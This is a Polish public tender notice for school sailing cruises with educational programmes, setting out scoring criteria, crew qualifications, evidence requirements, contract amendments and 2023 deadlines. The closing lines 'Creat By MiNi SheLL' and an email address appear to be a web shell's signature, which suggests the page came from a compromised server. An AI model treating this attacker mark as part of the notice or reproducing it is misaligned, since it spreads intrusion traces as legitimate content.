„Cena”<br/>CN – najniższa oferowana cena<br/>CR – cena oferty rozpatrywanej<br/>2.2 Dla kryterium „Dodatkowa wycieczka edukacyjna” – PK2<br/>W kryterium „Dodatkowa wycieczka edukacyjna” Zamawiający przyzna punkty za zorganizowanie dodatkowej wycieczki edukacyjnej podczas trasy rejsu ponad obligatoryjną wskazanym w opisie przedmiotu zamówienia, tj. OPZ, Dział II Program rejsu i zagadnienia przeznaczone do omówienia. Dodatkowa wycieczka edukacyjna powinna obejmować zwiedzanie z przewodnikiem Westerplatte.<br/>Punkty w kryterium „Dodatkowa wycieczka edukacyjna” będą przyznawane przez Zamawiającego w następujący sposób:<br/>• Zorganizowanie dodatkowej wycieczki edukacyjnej z przewodnikiem po Westerplatte – 20 pkt.<br/>• Brak zorganizowania dodatkowej wycieczki edukacyjnej z przewodnikiem po Westerplatte – 0 pkt.<br/>W związku z powyższym, Wykonawca zobowiązany jest wskazać w Formularzu ofertowym część B czy zorganizuje dodatkową wycieczkę edukacyjną z przewodnikiem po Westerplatte podczas rejsu. W przypadku niewskazania żadnej z opcji lub wskazania obydwu – Zamawiający przyjmie, że<br/>Wykonawca nie zorganizuje dodatkowego wyjścia do portu połączonego z wycieczką edukacyjną oraz przyzna 0 pkt w przedmiotowym kryterium.<br/>2.3 Dla kryterium „Dodatkowe elementy programu” – PK3<br/>W kryterium „Dodatkowe elementy programu”, dotyczące działalności edukacyjnej, ocena będzie dokonana w oparciu o podane przez Wykonawców w Formularzu ofertowym część C informacje na temat dodatkowych elementów programu ponad obligatoryjne wskazane w szczegółowym opisie przedmiotu zamówienia, tj. OPZ, Dział II. Program rejsu i zagadnienia przeznaczone do omówienia.<br/>Zaplanowana elementy programu powinny mieć charakter edukacyjny oraz integracyjny wszystkich uczestników rejsu.<br/>Zamawiający będzie punktował oświadczenie wskazane w Formularzu ofertowym o zrealizowaniu dodatkowego elementu programu, tj.:<br/>1) etykieta żeglarska (zajęcia powinny obejmować tematy: zasady zachowania się na jachcie i obyczaje żeglarskie, etykieta flagowa) – 4 pkt;<br/>2) ludzie morza – ich pasje i dokonania (zajęcia powinny przedstawiać opis osoby związanej z morzem) – 4 pkt;<br/>3) zawody związane z morzem (zajęcia powinny obejmować opis minimum trzech zawodów związanych z morzem) – 4 pkt;<br/>4) konkursy edukacyjne (zajęcia mogą zostać przeprowadzone w formie quizu) – 4 pkt;<br/>5) kurs szant (uczestnicy poznają i zaśpiewają wspólnie minimum dwie szanty) – 4 pkt.<br/>W związku z powyższym, Wykonawca może wskazać w Formularzu ofertowy dodatkowe elementy programu. Maksymalna liczba punktów w tym kryterium wynosi 20 . Wykonawca otrzyma 0 pkt za niewskazanie dodatkowego elementu programu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa Wycieczka Edukacyjna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy element programu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu dla Części 1 :<br/> O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ust. 2 niniejszego rozdziału. 2. Zamawiający wymaga spełnienia warunków udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej, tj.: Warunki te zostaną spełnione, jeżeli:<br/>1) Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, zorganizował należycie co najmniej dwie odrębne usługi, polegające na zorganizowaniu rejsu dla co najmniej 20 osobowej grupy młodzieży szkolnej (każda usługa), zawierającego elementy wykładowe i warsztaty (każda usługa), trwającego minimum 4 dni (każda usługa) o wartości nie mniejszej niż 50 000,00 zł brutto (każda usługa).<br/>UWAGA: a) Przez dwie odrębne usługi rozumie się usługi wykonane na podstawie dwóch różnych zleceń/umów, b) jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych innego podmiotu, powyższy warunek zostanie uznany za spełniony, jeżeli spełnia go w całości ten podmiot, c) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, wyżej wymieniony warunek udziału w postępowaniu winien spełniać w całości co najmniej jeden z Wykonawców, d) w przypadku, gdy za wykonane przez Wykonawcę usługi rozliczenie nastąpiło w walucie innej niż w PLN, Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu, zobowiązany jest do przeliczenia wartości wykonanych usług przyjmując średni kurs złotego w stosunku do walut obcych określony w tabeli kursów średnich walut obcych Narodowego Banku Polskiego - opublikowanych na dzień zamieszczenia Ogłoszenia o zamówieniu oraz Specyfikacji Warunków Zamówienia na stronie Zamawiającego.<br/> 2) Wykonawca wskaże, że skieruje do wykonania przedmiotu zamówienia minimum 4 osoby posiadające wymagane kwalifikację tj.<br/>a) osobę, która będzie pełniła funkcje kapitana, posiadającą minimum 400 godzin doświadczenia w samodzielnym prowadzeniu jachtu o długości kadłuba powyżej 7,5 m po akwenie morskim, który został wskazany w formularzu ofertowym przez wykonawcę jako miejsce realizacji zamówienia oraz posiada patent jachtowego sternika morskiego i posiada ważny certyfikat STCW lub równoważny <br/>b) 3 osoby, która będą pełnić funkcje członków załogi, przy czym każda z tych osób musi posiadać minimum 400 godzin doświadczenia w żegludze po akwenie morskim, który został wskazany w formularzu ofertowym przez wykonawcę jako miejsce realizacji zamówienia oraz każda z tych osób posiada patent jachtowego sternika morskiego i posiada ważny certyfikat STCW lub równoważny<br/><br/>Warunki udziału w postępowaniu dla Części 2 : O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ust. 2 niniejszego rozdziału<br/>2. Zamawiający wymaga spełnienia wszystkich warunków udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej, tj.: Warunki te zostaną spełniony, jeżeli:<br/>1) Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, zorganizował należycie co najmniej dwie odrębne usługi, polegające na zorganizowaniu rejsu dla grupy 20 osobowej młodzieży szkolnej (każda usługa), zawierającego elementy wykładowe i warsztaty (każda usługa), trwającego minimum 1 dzień (każda usługa) o wartości nie mniejszej niż 5 000,00 zł brutto (każda usługa).<br/>UWAGA: e) Przez dwie odrębne usługi rozumie się usługi wykonane na podstawie dwóch różnych zleceń/umów, f) jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych innego podmiotu, powyższy warunek zostanie uznany za spełniony, jeżeli spełnia go w całości ten podmiot, g) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, wyżej wymieniony warunek udziału w postępowaniu winien spełniać w całości co najmniej jeden z Wykonawców, h) w przypadku, gdy za wykonane przez Wykonawcę usługi rozliczenie nastąpiło w walucie innej niż w PLN, Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu, zobowiązany jest do przeliczenia wartości wykonanych usług przyjmując<br/>średni kurs złotego w stosunku do walut obcych określony w tabeli kursów średnich walut obcych Narodowego Banku Polskiego - opublikowanych na dzień zamieszczenia Ogłoszenia o zamówieniu oraz Specyfikacji Warunków Zamówienia na stronie Zamawiającego.<br/> 2) Wykonawca wskaże, że skieruje do wykonania przedmiotu zamówienia minimum 1 osobę, która będzie pełniła funkcje kapitana, posiadającą minimum 100 godzin doświadczenia w samodzielnym prowadzeniu jachtu o długości kadłuba powyżej 7,5 m po akwenie Morza Bałtyckiego oraz posiada patent jachtowego sternika morskiego i posiada ważny certyfikat STCW lub równoważny <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym, Zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia wstępnego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a) wykaz usług (według wzoru stanowiącego załącznik nr 9 do SWZ) zrealizowanych w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączenie dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami są:<br/>− referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane<br/>− oświadczenie Wykonawcy, jeżeli Wykonawca z przyczyn niezależnych od niego, nie jest w stanie uzyskać tych dokumentów.<br/>b) wykaz osób na potwierdzenie spełnienia warunku udziału w postępowaniu określonego w Rozdz. VIII ust. 2 SWZ dla Części nr 1, w rozdz. IX ust. 2 SWZ dla Części nr 2 - skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego ( wg. Wzoru stanowiącego załącznik nr 6 i 7 odpowiednio dla 1 i 2 części postepowania )<br/>2) jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia,<br/>3) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych środków.<br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, jakich może żądać Zamawiający od Wykonawcy, o których mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r., składane są zgodnie z przepisami rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przez Wykonawcę przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wraz z ofertą należy złożyć:<br/>1) oświadczenie o niepodleganiu wykluczeniu,<br/>Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale VII oraz<br/>VII.I SWZ.<br/>a) Oświadczenia składają odrębnie każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna).<br/>Wymagana forma:<br/>Oświadczenia składane są pod rygorem nieważności w formie elektronicznej, podpisane kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2) pełnomocnictwo, w przypadku:<br/>a) gdy umocowanie osoby składającej ofertę nie wynika dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty pełnomocnictwo lub inny dokument potwierdzający umocowanie<br/>do reprezentowania Wykonawcy, tj. umocowanie do złożenia oferty;<br/>b) w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie<br/>do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców albo do reprezentowania w postępowaniu i<br/>zawarciu umowy w sprawie zamówienia publicznego należy załączyć do oferty.<br/>2. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty należy załączyć pełnomocnictwo<br/>dla pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców,<br/>oraz pełnomocnictwa do zawarcia umowy w sprawie zamówienia publicznego, jeżeli pełnomocnictwo to nie wynika z treści<br/>tej umowy lub dokumentów załączonych do oferty.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, warunek udziału w<br/>postępowaniu wskazany w Rozdziale VIII ust. 2 SWZ, winien spełniać w całości co najmniej jeden z Wykonawców, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy w części 1 i 2 :<br/>1. Wszelkie istotne zmiany Umowy wymagają formy pisemnego aneksu pod rygorem nieważności.<br/>2. Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień niniejszej Umowy wskazanych w projekcie umowy stanowiącym załącznik nr.3 do SWZ, a w szczególności: <br/>1) zmiany terminu wykonania usługi, w przypadku:<br/>a) wystąpienia warunków niezależnych od obu stron np. pogodowych, zdrowotnych uniemożliwiających bezpieczne wykonanie usługi (rejsu)<br/>b) wystąpienia siły wyższej uniemożliwiającej wykonanie Przedmiotu Umowy zgodnie z jej postanowieniami, przez którą na potrzeby Umowy rozumie się zdarzenie zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć, oraz którego strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej staranności, w szczególności: powódź, pożar i inne klęski żywiołowe, nagłe przerwy w dostawie energii elektrycznej, itp. uniemożliwiające wykonanie zobowiązań umownych, jak również okoliczności związane z siłą wyższą, które już wystąpiły (COVID-19) lecz na dzień zawarcia Umowy nie są znane jej skutki,<br/>c) gdy zaistnieją przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec,<br/>2) zmiany wysokości wynagrodzenia Wykonawcy w przypadku w przypadku ustawowej zmiany stawki podatku VAT oraz podatku akcyzowego, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy, w takim przypadku kwota brutto zostanie obliczona na podstawie stawki tego podatku obowiązującej w chwili powstania obowiązku podatkowego,<br/>3. Wystąpienie okoliczności, o których mowa w ust. 2 skutkuje powstaniem po stronie<br/>Zamawiającego uprawnienia do wprowadzenia zmian do Umowy, nie zaś obowiązku. Okoliczności te nie mogą również stanowić podstawy roszczeń Wykonawcy o dodatkowe wynagrodzenie lub odszkodowanie.<br/>4. Wykonawca wnioskujący o zmianę Umowy przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do Umowy.<br/>Rozliczenie niniejszego zamówienia zostanie dokonane w walucie polskiej. <br/>Cd. sekcja IX <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy zakupowej. Adres strony internetowej prowadzonego postępowania: https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-17 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia.<br/>Część 1 : Termin wykonania zamówienia maksymalnie 10 dni, w tym wymagane jest 7 dni rejsu oraz maksymalnie 3 dni transportu z Gdańska do portu zaokrętowania i powrotu do Gdańska, przy czym zamówienie należy wykonać w okresie pomiędzy 12.04.2023 r. a 30.04.2023 r.<br/>Część 2: Przedmiot zamówienia zostanie przeprowadzony w okresie pomiędzy 4.09.2023 r. a 17.09.2023 r.:<br/>a) jednego dnia dla 50 uczestników (uczniowie szkół podstawowych i nauczyciele – opiekunowie szkolnej grupy projektowej). Wykonawca w ofercie zobowiązany jest podać jednodniowy termin realizacji zamówienia w okresie wskazanym przez Zamawiającego<br/>lub<br/>b) w dwa dni w przypadku podziału uczestników na dwie grupy, z zastrzeżeniem, że jedna grupa, ze względu na specyfikę Konkursu projektów uczniowskich, może liczyć maksymalnie 30 osób. Zamawiający poinformuje Wykonawcę o dokładnym podziale uczestników na grupy po ogłoszeniu wyników Konkursu projektów uczniowskich (lipiec/sierpień 2023 r.). Wykonawca w ofercie zobowiązany jest podać dwa jednodniowe terminy realizacji zamówienia w okresie wskazanym przez Zamawiającego.<br/><br/>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp. oraz na podstawie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego .<br/><br/>cd. sekcji VII <br/>POSTANOWIENIA UMOWNE DOTYCZĄCE TYLKO CZĘŚCI 2:<br/> Waloryzacja wynagrodzenia <br/>1.W związku z realizacją postanowień art. 439 ustawy pzp, strony postawiają, że w przypadku zmiany cen materiałów lub kosztów związanych z realizacją umowy, waloryzacja wynagrodzenia umownego następować będzie na wniosek którejkolwiek ze stron, na następujących zasadach:<br/>1)Wynagrodzenie brutto o której mowa w § 3 umowy będzie waloryzowana po upływie 6 miesięcy realizacji umowy, począwszy od dnia zawarcia umowy, pod warunkiem, że spełnione zostaną wymogi określone w poniższych pkt. 3-5.<br/>2)Zmiana wysokości wynagrodzenia Wykonawcy nastąpi, jeżeli zmiana cen materiałów lub kosztów związanych z realizacją umowy po upływie 6 miesięcy od jej zawarcia, będzie wyższa co najmniej 8% od wysokości tychże cen lub kosztów w dniu zawarcia umowy, ustalonych na podstawie Wskaźnika cen towarów i usług konsumpcyjnych w ujęciu kwartalnym (kwartał do kwartału), ogłaszanego przez Prezesa Głównego Urzędu Statystycznego (dalej: GUS) w Dzienniku Urzędowym Rzeczpospolitej Polskiej „Monitor Polski”;<br/>3)	Zmiana wysokości wynagrodzenia Wykonawcy będzie następowała od pierwszego dnia następującego po upływie 6 miesięcy od daty zawarcia umowy, pod warunkiem przedstawienia przez wykonawcę obiektywnych dowodów, w jaki sposób cena materiałów lub koszty związane z realizacją umowy, wpływają na warunki realizacji umowy, w szczególności na cenę wykonania usługi;<br/>4)	Wartość zmiany wynagrodzenia Wykonawcy będzie równa ½ wzrostowi Wskaźnika, wskazanego w ust. 3 i będzie dokonywana od wartości wynagrodzenia określonego w umowie.<br/>2.	Wykonawca, którego wynagrodzenie zostało zmienione na podstawie niniejszego paragrafu, zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki:<br/>1)	przedmiotem umowy są usługi,<br/>2)	okres obowiązywania umowy przekracza 6 miesięcy.<br/>3.	Obowiązek ten Wykonawca zobowiązany jest wykonać w terminie 14 dni od zawarcia aneksu do umowy z Zamawiającym, na mocy którego nastąpiła zmiana wynagrodzenia Wykonawcy z uwagi na zmianę cen materiałów lub kosztów związanych z realizacją przedmiotu umowy. Ponadto Wykonawca zobowiązany jest przedłożyć Zamawiającemu pisemne oświadczenie podwykonawcy potwierdzające wykonanie przez Wykonawcę obowiązku wobec podwykonawcy, o którym mowa powyżej, w terminie 30 dni od dnia zawarcia aneksu z podwykonawcą.

Creat By MiNi SheLL
Email: jattceo@gmail.com